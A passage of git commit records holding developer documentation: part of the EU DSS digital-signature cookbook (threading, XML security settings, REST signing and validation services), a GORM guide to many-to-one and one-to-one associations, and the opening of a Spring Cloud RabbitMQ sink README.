validates a policy if a \"zero hash\" value is defined in the signature (see <<R02>>);\n * EmptySignaturePolicyValidator: used if a policy file is not found or not accessible.\n\n== Multi-threading\n\nDSS can be used in multi-threaded environments, but some points need to be considered, like resource sharing and caching. All operations are stateless, and this fact has to be preserved. Some resources can be shared, others are specific to an operation. \n\nFor each provided operation, DSS requires a CertificateVerifier object. This object is responsible for providing certificates and accessing external resources (AIA, CRL, OCSP,...). At the beginning of every operation, CertificateSources and RevocationSources are created for each signature \/ timestamp \/ revocation data. The extracted information is combined with the configured sources in the CertificateVerifier. For these reasons, integrators need to be careful about the CertificateVerifier configuration.\n\n=== Resource sharing\n\nThe trusted certificates can be shared between multiple threads because these certificates are static. This means they don't require further analysis: their status won't evolve. For these certificates, DSS doesn't need to collect the issuer certificate and\/or their revocation data. \n\nBy contrast, the adjunct certificates cannot be shared. These certificates concern a specific signature\/validation operation. This parameter is used to provide missing certificate(s): when DSS is unable to build the complete certificate path with the provided certificates (as signature parameters or embedded within a signature), it is possible to inject the missing certificates. These certificates are not necessarily trusted and may require future \"modifications\", like revocation data collection,...
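\n\nA minimal sketch of this separation is shown below; the multi-source setters (`setTrustedCertSources`, `setAdjunctCertSources`) are assumed to be available in your DSS version (older releases expose singular variants):\n\n.Sharing certificate sources between threads (sketch)\n[source,java,indent=0]\n----\n\/\/ shared, static trusted certificates - safe to reuse between threads\nCommonTrustedCertificateSource trustedCertificateSource = new CommonTrustedCertificateSource();\n\/\/ ... filled once at application startup ...\n\n\/\/ per-operation verifier - adjunct certificates belong to a single signature\nCommonCertificateVerifier certificateVerifier = new CommonCertificateVerifier();\ncertificateVerifier.setTrustedCertSources(trustedCertificateSource); \/\/ shared\ncertificateVerifier.setAdjunctCertSources(new CommonCertificateSource()); \/\/ one per operation\n----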
\n\n=== Caching\n\nIn case of multi-threaded usage, we strongly recommend caching external resources. All external resources can be cached (AIA, CRL, OCSP) to improve performance and to avoid requesting the same resources too many times. FileCacheDataLoader and JdbcCacheCRLSource can help you with this. \n\n[[xmlSecurities]]\n== XML Securities\n\nSince DSS 5.7, the framework allows custom configuration of XML-related modules for enabling\/disabling XML securities (e.g. in order to use Xalan or Xerces).\n\nWARNING: We strongly recommend not disabling security features nor using deprecated dependencies. Be aware: the feature is designed only for experienced users, and all changes made in the module are at your own risk.\n\nThe configuration is available for the following classes:\n\n * `javax.xml.parsers.DocumentBuilderFactory` with a `DocumentBuilderFactoryBuilder` - builds a DOM document object from the obtained XML file and creates a new Document;\n * `javax.xml.transform.TransformerFactory` with a `TransformerFactoryBuilder` - loads XML templates and builds DOM objects;\n * `javax.xml.validation.SchemaFactory` with a `SchemaFactoryBuilder` - loads XML Schema;\n * `javax.xml.validation.Validator` with a `ValidatorConfigurator` - configures a validator to validate an XML document against an XML Schema. \n \nAll the classes can be configured with the following methods (example for `TransformerFactory`):\n\n[source,java,indent=0]\n.XMLSecurities configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=demo]\n----\n\nThe `javax.xml.parsers.DocumentBuilderFactory`, which allows parsing XML files and creating DOM `Document` objects, can be configured with the following methods:\n\nNOTE: Since DSS 5.9 the configuration of `javax.xml.parsers.DocumentBuilderFactory` has been moved from `DomUtils` to a new singleton class `DocumentBuilderFactoryBuilder`.\n\n[source,java,indent=0]\n.DocumentBuilderFactory configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=dbf]\n----\n\nThe class `XmlDefinerUtils` is a singleton, therefore all changes performed on the instance will have an impact on all calls of the related methods.\n\n== JAXB modules\n\nSince version 5.5, DSS provides the following JAXB modules with a harmonized structure:\n\n * `dss-policy-jaxb` - defines the validation policy JAXB model\n * `dss-diagnostic-jaxb` - defines the Diagnostic Data JAXB model\n * `dss-detailed-report-jaxb` - defines the Detailed Report JAXB model\n * `dss-simple-report-jaxb` - defines the Simple Report JAXB model\n * `dss-simple-certificate-report-jaxb` - defines the Certificate Simple Report JAXB model\n \nAll modules share the same logic and have the following structure (where *** is a model name):\n\n`*_dss-***-jaxb_*`::\n\t`*_src\/main\/java_*`:::\n\t\t`*_eu.europa.esig.dss.***_*`::::\n\t\t\t** `*_***.java_*` - wrapper(s) which ease the JAXB manipulation\n\t\t\t** `*_..._*`\n\t\t\t** `*_***Facade.java_*` - class which allows marshalling\/unmarshalling of jaxb objects, generation of HTML\/PDF content, etc.\n\t\t\t** `*_***XmlDefiner.java_*` - class which contains the model definition (XSD, XSLT references, ObjectFactory)\n\t\t\t** `*_jaxb_*` - generated at compile time\n\t\t\t \t*** `*_Xml***.java_*` - JAXB model\n\t\t\t\t*** `*_..._*`\n\t`*_src\/main\/resources_*`:::\n\t\t`*_xsd_*`::::\n\t\t\t** `*_***.xsd_*` - XML Schema (XSD) for the *** model
\n\t\t\t** `*_binding.xml_*` - XJC instructions to generate the JAXB model from the XSD\n\t\t`*_xslt_*`::::\n\t\t\t** `*_html_*`\n\t\t\t*** \t`*_***.xslt_*` - XML Stylesheet for the HTML generation\n\t\t\t** `*_pdf_*`\n\t\t\t***\t`*_***.xslt_*` - XML Stylesheet for the PDF generation\n\nIn the main classes, a `Facade` is present to operate quickly with the JAXB objects (e.g. marshall, unmarshall, generate the HTML\/PDF, validate the XML structure,...).\n\n[source,java,indent=0]\n.DetailedReportFacade usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-facade]\n----\n\nAn `XmlDefiner` is also available with access to the embedded XML Schemas (XSD), the XML Stylesheets (XSLT) to be able to generate the HTML or PDF content (for DSS-specific JAXB) and the JAXB Object Factory.\n\n[source,java,indent=0]\n.DetailedReportXmlDefiner usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-xml-definer]\n----\n\n=== Report stylesheets\n\nThe report modules (namely: `dss-simple-report-jaxb`, `dss-simple-certificate-report-jaxb` and `dss-detailed-report-jaxb`) each contain two XSLT stylesheets for final report generation:\n\n * Bootstrap 4 XSLT for the HTML report;\n * PDF XSLT for the PDF report.\n\nNOTE: Since DSS 5.9 only the Bootstrap 4 XSLT is provided within the framework for HTML report generation.\n \nIn order to generate a report with a selected stylesheet you need to call the relevant method in a Facade class (see the class definitions above):\n\n[source,java,indent=0]\n.HTML report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=demo]\n----\n\nOtherwise, if you need to customize the transformer, you can create a report by using an XmlDefiner:\n\n[source,java,indent=0]\n.Custom report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=custom]\n----\n\n== Alerts\n\nSince DSS 5.7 the framework includes an extended possibility to execute custom processes in case of arbitrarily defined events.\n\nThe `Alert` is a basic interface used to trigger a process on a passed object.\nDSS provides an `AbstractAlert` implementation of the interface with a clearly defined structure. The class must be instantiated with two attributes:
\n\n * `AlertDetector` - used to detect an event\/state of the object and trigger a process;\n * `AlertHandler` - defines a process to be executed on an object.\n\nIn its basic module, the framework provides a few alerts based on a `Status`:\n\n * `ExceptionOnStatusAlert` - throws an `AlertException` (RuntimeException) when the status reports an issue;\n * `LogOnStatusAlert` - logs a message with the defined log level;\n * `SilentOnStatusAlert` - ignores the reported issue and does nothing.\n\nThe usage of alerts is available in the following classes:\n\n * <<xmlSecurities>> configurators from the `dss-jaxb-parsers` module: `TransformerFactoryBuilder`, `SchemaFactoryBuilder`, `ValidatorConfigurator`;\n * <<certificateVerifier>> - to handle the unexpected situation(s) in a custom way (`AlertException` was introduced to re-throw exceptions);\n * <<tlValidationJob>> - to process custom actions on a change\/state when loading LOTL\/TLs (see `LOTLAlert` and `TLAlert`).\n\n== I18N (Internationalization)\n\nSince DSS 5.6 a new module has been introduced allowing the language of reports generated by DSS to be changed. The current version of the framework allows customization of text values only for a `DetailedReport`.\n\nThe target language of the report can be set with the following code:\n\n[source,java,indent=0]\n.Language customization\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=i18n]\n----\n\nIf no language is specified, the framework will use the default Locale obtained from the OS of the running machine. If a requested language is not found, the default translation will be used.\n\nBy default, DSS provides an English translation.\n\nIn order to provide a custom translation, a new file must be created inside the `src\\main\\resources` directory of your project with a name following one of the patterns: \n\n`dss-messages_XX.properties` or \n`dss-messages_XX_YY.properties`, where:\n\n * XX - an abbreviation of the target language;\n * YY - a country code.\n\nFor example, for the French language a file named `dss-messages_fr.properties` needs to be created, or `dss-messages_fr_FR.properties` to use it only for the French locale of France.\n\n== Additional features\n\n=== Certificate validation\n\nDSS offers the possibility to validate a certificate. For a given certificate, the framework builds a certificate path up to a known trust anchor (trusted list, keystore,...), validates each found certificate (OCSP \/ CRL) and determines its European \"qualification\". \n\nTo determine the certificate qualification, DSS follows the draft standard ETSI TS 119 172-4 (<<R10>>). It analyses the certificate properties (QCStatements, Certificate Policies,...) and applies possible overrules from the related trusted list (\"caught\" qualifiers from a trust service). More information about qualifiers can be found in the standard ETSI TS 119 612 (<<R11>>).\n\nDSS always computes the status at two different times: certificate issuance and signing\/validation time. The certificate qualification can evolve over time; its status is not immutable (e.g. a trust service provider may lose its granted status). The eIDAS regulation (<<R12>>) clearly defines these different times in Article 32 and the related Annex I.
\n\n[source,java,indent=0]\n.Validate a certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/CertificateValidationTest.java[tags=demo]\n----\n\n=== SSL Certificate validation (QWAC)\n\nWith DSS, it is also possible to validate an SSL certificate against the EUMS TL and ETSI TS 119 615 to determine whether it is a Qualified certificate for WebSite Authentication (QWAC).\n\n[source,java,indent=0]\n.Validate an SSL certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/QWACValidationTest.java[tags=demo]\n----\n\n=== Extract the signed data from a signature\n\nDSS is able to retrieve the original data from a valid signature. \n\n[source,java,indent=0]\n.Retrieve original data from a signed document\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/RetrieveOriginalDocumentTest.java[tags=demo]\n----\n\n== REST and SOAP Services\n\nDSS offers REST and SOAP web services. Additionally, we also provide a SOAP-UI project and Postman samples in the `dss-cookbook` module.\n\nThe different webservices are:\n\n * Signature webservices (`dss-signature-soap` \/ `dss-signature-rest`) and their clients: they expose methods to allow signing and extending or counter-signing a signature from a client.\n * Server-signing webservice (`dss-server-signing-soap` \/ `dss-server-signing-rest`) and their clients: they expose methods to retrieve keys from a server (PKCS#11, PKCS#12, HSM,...) and to sign the digest on the server side.\n * Signature validation webservices (`dss-validation-soap` \/ `dss-validation-rest`) and their clients: they expose methods to allow signature validation, with an optional detached file and an optional validation policy.\n * Certificate validation webservices (`dss-certificate-validation-soap` \/ `dss-certificate-validation-rest`) and their clients: they expose methods to allow certificate validation, with an optionally provided certificate chain and a custom validation time.\n * Timestamp webservices (`dss-timestamp-remote-soap` \/ `dss-timestamp-remote-rest`) and their clients: they expose methods to allow remote timestamp creation, by providing the digest value to be timestamped and the digest algorithm used for the digest calculation.\n \nThe data structure in the webservices is similar in both the REST and SOAP modules.\n\nThe documentation below covers the REST calls. All the REST services present in DSS are compliant with the https:\/\/www.openapis.org\/[OpenAPI Specification].\n\n=== REST signature service\n\nThis service exposes 4 methods for one or more document(s):\n\n[source,java,indent=0]\n.Rest signature service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestSignatureServiceSnippet.java[tags=demo]\n----\n \n==== Get data to sign\n\nThe method allows retrieving the data to be signed. The user sends the document to be signed, the parameters (signature level,...) and the certificate chain.
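\n\nThe overall exchange is sketched below; the method names follow the `RemoteDocumentSignatureService` client API of recent DSS versions, `parameters` is a `RemoteSignatureParameters` instance, and `signWithUserToken` is a hypothetical helper standing for the user's signing device:\n\n.Typical getDataToSign \/ signDocument exchange (sketch)\n[source,java,indent=0]\n----\n\/\/ 1. first call: compute the data to be signed\nToBeSignedDTO dataToSign = signatureService.getDataToSign(toSignDocument, parameters);\n\n\/\/ 2. sign the data with the user's private key (e.g. on a SmartCard) - outside of DSS\nSignatureValueDTO signatureValue = signWithUserToken(dataToSign); \/\/ hypothetical helper\n\n\/\/ 3. second call: MUST reuse the very same parameters (especially the signing date)\nRemoteDocument signedDocument = signatureService.signDocument(toSignDocument, parameters, signatureValue);\n----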
\n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-response.adoc[]\n\n==== Sign document\n\nThe method allows generation of the signed document with the received signature value.\n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-response.adoc[]\n\n==== Extend document\n\nThe method allows extension of an existing signature to a stronger level.\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-response.adoc[]\n\n==== Timestamp document\n\nThe method allows timestamping of a provided document.\nAvailable for PDF, ASiC-E and ASiC-S container formats.\n\n.Request\ninclude::_restdocs\/timestamp-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/timestamp-one-document\/1\/http-response.adoc[]\n\n==== Get data to be counter signed\n\nThis method returns the data to be signed in order to create a counter signature. The user should provide a document containing a signature to be counter signed, the id of the signature, and other parameters, similar to the 'getDataToSign()' method.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/1\/http-response.adoc[]\n\n==== Counter Sign Signature\n\nThis method incorporates a created counter signature into the unsigned properties of the master signature with the specified id.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/2\/http-response.adoc[]\n\n=== REST server signature service\n\nThis service also exposes 4 methods:\n\n[source,java,indent=0]\n.Rest server signing service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestServerSigningSnippet.java[tags=demo]\n----\n\n==== Get keys\n\nThis method allows retrieving all available keys on the server side (PKCS#11, PKCS#12, HSM,...). All keys have an alias, a signing certificate and its chain. The alias will be used in the following steps.
\n\n.Request\ninclude::_restdocs\/get-keys\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-keys\/1\/http-response.adoc[]\n\n==== Get key\n\nThis method allows retrieving the key information for a given alias.\n\n.Request\ninclude::_restdocs\/get-key\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-key\/1\/http-response.adoc[]\n\n==== Sign\n\nThis method allows signing given digests with a server-side certificate.\n\n.Request\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-response.adoc[]\n\n=== REST validation service\n\nDSS also provides a module for document validation.\n\n==== Validate a document\n\nThis service allows a signature validation (all formats\/types) against a validation policy.\n\n.Request\ninclude::_restdocs\/validate-doc\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-doc\/1\/http-response.adoc[]\n\n==== Retrieve original document(s)\n\nThis service returns the signed data for a given signature.\n\n.Request\ninclude::_restdocs\/get-original-documents\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-original-documents\/1\/http-response.adoc[]\n\n=== REST certificate validation service\n\n==== Validate a certificate\n\nThis service allows a certificate validation (provided in a binary format).\n\n.Request\ninclude::_restdocs\/validate-cert\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-cert\/1\/http-response.adoc[]\n\n=== REST remote timestamp service\n\n==== Get Timestamp Response\n\nThis service allows a remote timestamp creation. The method takes as input the digest to be timestamped and the digest algorithm that has been used for the digest value computation. The output of the method is the generated timestamp's binaries.\n\n.Request\ninclude::_restdocs\/get-timestamp-response\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-timestamp-response\/1\/http-response.adoc[]\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"197a1dfd07b777794227406223c2140c6b836b9a","subject":"Update manyToOneAndOneToOne.adoc - minor typo","message":"Update manyToOneAndOneToOne.adoc - minor typo","repos":"grails\/gorm-hibernate5","old_file":"docs\/src\/docs\/asciidoc\/domainClasses\/gormAssociation\/manyToOneAndOneToOne.adoc","new_file":"docs\/src\/docs\/asciidoc\/domainClasses\/gormAssociation\/manyToOneAndOneToOne.adoc","new_contents":"A many-to-one relationship is the simplest kind, and is defined with a property of the type of another domain class. Consider this example:\n\n\n===== Example A\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n}\n----\n\nIn this case we have a unidirectional many-to-one relationship from `Face` to `Nose`. To make this relationship bidirectional define the other side as follows (and see the section on controlling the ends of the association just below):\n\n\n===== Example B\n\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n static belongsTo = [face:Face]\n}\n----\n\nIn this case we use the `belongsTo` setting to say that `Nose` \"belongs to\" `Face`. The result of this is that we can create a `Face`, attach a `Nose` instance to it and when we save or delete the `Face` instance, GORM will save or delete the `Nose`. 
In other words, saves and deletes will cascade from `Face` to the associated `Nose`:\n\n[source,groovy]\n----\nnew Face(nose:new Nose()).save()\n----\n\nThe example above will save both face and nose. Note that the inverse _is not_ true and will result in an error due to a transient `Face`:\n\n[source,groovy]\n----\nnew Nose(face:new Face()).save() \/\/ will cause an error\n----\n\nNow if we delete the `Face` instance, the `Nose` will go too:\n\n[source,groovy]\n----\ndef f = Face.get(1)\nf.delete() \/\/ both Face and Nose deleted\n----\n\nTo make the relationship a true one-to-one, use the `hasOne` property on the owning side, e.g. `Face`:\n\n\n===== Example C\n\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\nNote that using this property puts the foreign key on the inverse table to the example A, so in this case the foreign key column is stored in the `nose` table inside a column called `face_id`.\n\nNOTE: `hasOne` only works with bidirectional relationships.\n\nFinally, it's a good idea to add a unique constraint on one side of the one-to-one relationship:\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n\n static constraints = {\n nose unique: true\n }\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\n\n===== Controlling the ends of the association\n\n\nOccasionally you may find yourself with domain classes that have multiple properties of the same type. They may even be self-referential, i.e. the association property has the same type as the domain class it's in. Such situations can cause problems because GORM may guess incorrectly the type of the association. Consider this simple class:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nAs far as GORM is concerned, the `parent` and `supervisor` properties are two directions of the same association. So when you set the `parent` property on a `Person` instance, GORM will automatically set the `supervisor` property on the other `Person` instance. This may be what you want, but if you look at the class, what we in fact have are two unidirectional relationships.\n\nTo guide GORM to the correct mapping, you can tell it that a particular association is unidirectional through the `mappedBy` property:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static mappedBy = [ supervisor: \"none\", parent: \"none\" ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nYou can also replace \"none\" with any property name of the target class. And of course this works for normal domain classes too, not just self-referential ones. Nor is the `mappedBy` property limited to many-to-one and one-to-one associations: it also works for one-to-many and many-to-many associations as you'll see in the next section.\n\nWARNING: If you have a property called \"none\" on your domain class, this approach won't work currently! The \"none\" property will be treated as the reverse direction of the association (or the \"back reference\"). 
Fortunately, \"none\" is not a common domain class property name.\n\n===== Replacing a many-to-one collection\n\nGiven these GORM entities:\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nImagine you have a book with two reviews:\n\n[source,groovy]\n----\nnew Book(name: 'Daemon')\n .addToReviews(new Review(quote: 'Daemon does for surfing the Web what Jaws did for swimming in the ocean.', author: 'Chicago Sun-Times'))\n .addToReviews(new Review(quote: 'Daemon is wet-yourself scary, tech-savvy, mind-blowing!', author: 'Paste Magazine'))\n .save()\n----\n\nYou could create a method to replace the `reviews` collection as illustrated next:\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n clearReviews(book)\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n\nvoid clearReviews(Book book) {\n List<Serializable> ids = []\n book.reviews.collect().each {\n book.removeFromReviews(it)\n ids << it.id\n }\n Review.executeUpdate(\"delete Review r where r.id in :ids\", [ids: ids])\n}\n----\n\nAlternatively you could leverage http:\/\/docs.grails.org\/latest\/ref\/Database%20Mapping\/cascade.html[cascade] behaviour.\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n static mappping = {\n reviews cascade: 'all-delete-orphan'\n }\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nThe cascade behaviour takes cares of deleting every orphan `Review`. Thus, invoking `.clear()` suffices to remove the book's previous reviews.\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n book.reviews.clear()\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n----\n","old_contents":"A many-to-one relationship is the simplest kind, and is defined with a property of the type of another domain class. Consider this example:\n\n\n===== Example A\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n}\n----\n\nIn this case we have a unidirectional many-to-one relationship from `Face` to `Nose`. To make this relationship bidirectional define the other side as follows (and see the section on controlling the ends of the association just below):\n\n\n===== Example B\n\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n static belongsTo = [face:Face]\n}\n----\n\nIn this case we use the `belongsTo` setting to say that `Nose` \"belongs to\" `Face`. The result of this is that we can create a `Face`, attach a `Nose` instance to it and when we save or delete the `Face` instance, GORM will save or delete the `Nose`. In other words, saves and deletes will cascade from `Face` to the associated `Nose`:\n\n[source,groovy]\n----\nnew Face(nose:new Nose()).save()\n----\n\nThe example above will save both face and nose. 
Note that the inverse _is not_ true and will result in an error due to a transient `Face`:\n\n[source,groovy]\n----\nnew Nose(face:new Face()).save() \/\/ will cause an error\n----\n\nNow if we delete the `Face` instance, the `Nose` will go too:\n\n[source,groovy]\n----\ndef f = Face.get(1)\nf.delete() \/\/ both Face and Nose deleted\n----\n\nTo make the relationship a true one-to-one, use the `hasOne` property on the owning side, e.g. `Face`:\n\n\n===== Example C\n\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\nNote that using this property puts the foreign key on the inverse table to the example A, so in this case the foreign key column is stored in the `nose` table inside a column called `face_id`.\n\nNOTE: `hasOne` only works with bidirectional relationships.\n\nFinally, it's a good idea to add a unique constraint on one side of the one-to-one relationship:\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n\n static constraints = {\n nose unique: true\n }\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\n\n===== Controlling the ends of the association\n\n\nOccasionally you may find yourself with domain classes that have multiple properties of the same type. They may even be self-referential, i.e. the association property has the same type as the domain class it's in. Such situations can cause problems because GORM may guess incorrectly the type of the association. Consider this simple class:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nAs far as GORM is concerned, the `parent` and `supervisor` properties are two directions of the same association. So when you set the `parent` property on a `Person` instance, GORM will automatically set the `supervisor` property on the other `Person` instance. This may be what you want, but if you look at the class, what we in fact have are two unidirectional relationships.\n\nTo guide GORM to the correct mapping, you can tell it that a particular association is unidirectional through the `mappedBy` property:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static mappedBy = [ supervisor: \"none\", parent: \"none\" ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nYou can also replace \"none\" with any property name of the target class. And of course this works for normal domain classes too, not just self-referential ones. Nor is the `mappedBy` property limited to many-to-one and one-to-one associations: it also works for one-to-many and many-to-many associations as you'll see in the next section.\n\nWARNING: If you have a property called \"none\" on your domain class, this approach won't work currently! The \"none\" property will be treated as the reverse direction of the association (or the \"back reference\"). 
Fortunately, \"none\" is not a common domain class property name.\n\n===== Replacing a many-to-one collection\n\nGiven these GORM entities:\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nImagine you have a book with two reviews:\n\n[source,groovy]\n----\nnew Book(name: 'Daemon')\n .addToReviews(new Review(quote: 'Daemon does for surfing the Web what Jaws did for swimming in the ocean.', author: 'Chicago Sun-Times'))\n .addToReviews(new Review(quote: 'Daemon is wet-yourself scary, tech-savvy, mind-blowing!', author: 'Paste Magazine'))\n .save()\n----\n\nYou could create a method to replace the `reviews` collection as illustrated next:\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n clearReviews(book)\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n\nvoid clearReviews(Book book) {\n List<Serializable> ids = []\n book.reviews.collect().each {\n book.removeFromReviews(it)\n ids << it.id\n }\n Review.executeUpdate(\"delete Review r where r.id in :ids\", [ids: ids])\n}\n----\n\nAlternatively you could leverage http:\/\/docs.grails.org\/latest\/ref\/Database%20Mapping\/cascade.html[cascade] behaviour.\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n static mappping = {\n reviews cascade: 'all-delete-orphan'\n }\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nThe cascade behaviour takes cares of deleting every orphan `Review`. Thus, invoking `.clear()` suffices to remove the book' previous reviews.\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n book.reviews.clear()\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2774963227bb71b97faa7868c832b53e99ce76c","subject":"Fixing a doc tag thats causing the -Pfull build to fail on CI","message":"Fixing a doc tag thats causing the -Pfull build to fail on CI\n","repos":"spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters","old_file":"rabbit\/spring-cloud-starter-stream-sink-rabbit\/README.adoc","new_file":"rabbit\/spring-cloud-starter-stream-sink-rabbit\/README.adoc","new_contents":"\/\/tag::ref-doc[]\n= RabbitMQ Sink\n\nThis module sends messages to RabbitMQ.\n\n== Options\n\nThe **$$rabbit$$** $$sink$$ has the following options:\n\n(See the Spring Boot documentation for RabbitMQ connection properties)\n\n\/\/tag::configuration-properties[]\n$$rabbit.converter-bean-name$$:: $$The bean name for a custom message converter; if omitted, a SimpleMessageConverter is used.\n If 'jsonConverter', a Jackson2JsonMessageConverter bean will be created for you.$$ *($$String$$, default: `<none>`)*\n$$rabbit.exchange$$:: $$Exchange name - overridden by exchangeNameExpression, if supplied.$$ *($$String$$, default: `<empty string>`)*\n$$rabbit.exchange-expression$$:: $$A SpEL expression that evaluates 
